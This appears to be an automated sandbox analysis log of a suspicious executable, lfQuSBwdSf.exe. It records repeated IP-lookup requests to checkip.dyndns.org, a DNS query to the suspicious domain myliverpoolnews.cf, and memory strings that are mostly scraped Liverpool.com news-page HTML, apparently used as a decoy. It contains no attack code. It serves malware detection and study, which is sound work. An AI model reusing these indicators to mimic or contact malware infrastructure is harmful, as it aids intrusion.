                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
                      Source: unknownDNS traffic detected: queries for: myliverpoolnews.cf
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: powershell.exe, 00000005.00000002.514285099.0000000002F19000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmpString found in binary or memory: http://crl3.d
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                      Source: lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf
                      Source: lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
                      Source: powershell.exe, 00000005.00000002.536067747.00000000058E2000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.535279406.0000000005E25000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
                      Source: powershell.exe, 00000005.00000002.526440831.00000000049BB000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.522995118.0000000004881000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.520364713.0000000004DC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000005.00000002.526440831.00000000049BB000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                      Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
                      Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
                      Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
                      Source: powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ded/script.js
                      Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
